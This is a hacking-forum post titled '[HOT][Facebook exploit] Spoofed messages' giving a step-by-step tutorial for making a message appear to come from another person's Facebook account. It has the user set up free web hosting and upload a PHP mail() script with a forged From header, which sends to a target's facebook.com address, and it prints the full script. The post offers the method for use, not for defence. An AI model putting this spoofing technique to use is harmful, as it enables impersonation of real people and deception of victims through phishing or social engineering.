Jump to content

[HOT][Facebook exploit] Spoofed messages


`NeverMore

Recommended Posts

Hello mxc members

in this guide i am going to show you , how to send spoofed messages from any facebook account !

 


 

How this works ?

 

Using this method you are able to send messages from any facebook account (eg. one friend of you) to your facebook account ! This can be happend using e-mail !


 

Requirements ?

 

1) WebHosting

2) Real e-mail of the friend that we want to send us the message ( i am going to make TuT on how to find real e-mails later )

3) Your facebook id ( go to your profile and )

3) A working brain

 


 

Lets start, you will need 5 steps

 

1st step , as i told you before we will need a webhosting ! The best free webhosting arround for me is www.000webhost.com ! So create here an account and be ready for the step 2 !

2nd step , download from here the script ( we will need this in step 3)

3rd step , now log in (www.000webhost.com) and create a new domain(host) , then upload the file we downloaded before !

4th step , now edit the file( send.php ) and make it like the image ( image )

 

eg.

<?php

$to = 'nevermore.stav@facebook.com';

$subject = '';

$message = '...................................................';

$header = 'From: moufis@gmail.gr
Reply-To: moufis@gmail.gr';

$mail = mail($to,$subject,$message,$header);

if($mail) {
echo 'Email sent to '.$to;
}
?>
<hr />

 

This example will send message"..................................................." from facebook with e-mail "moufis@gmail.gr" to my facebook (with id "nevermore.stav@facebook.com") !

 

5th step , save the send.php file and go to "http://yourhost/send.php" (eg.http://fbmessage.net84.net/send.php)

 

 

DONE , check your facebook and you will have a spoofed message !

 

 


 

Thanks for reading , if you dont understand something feel free to ask me !

You can have fun using this method !

 

NEVERMORE

Link to comment
Share on other sites

  • 5 months later...
  • 3 weeks later...

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...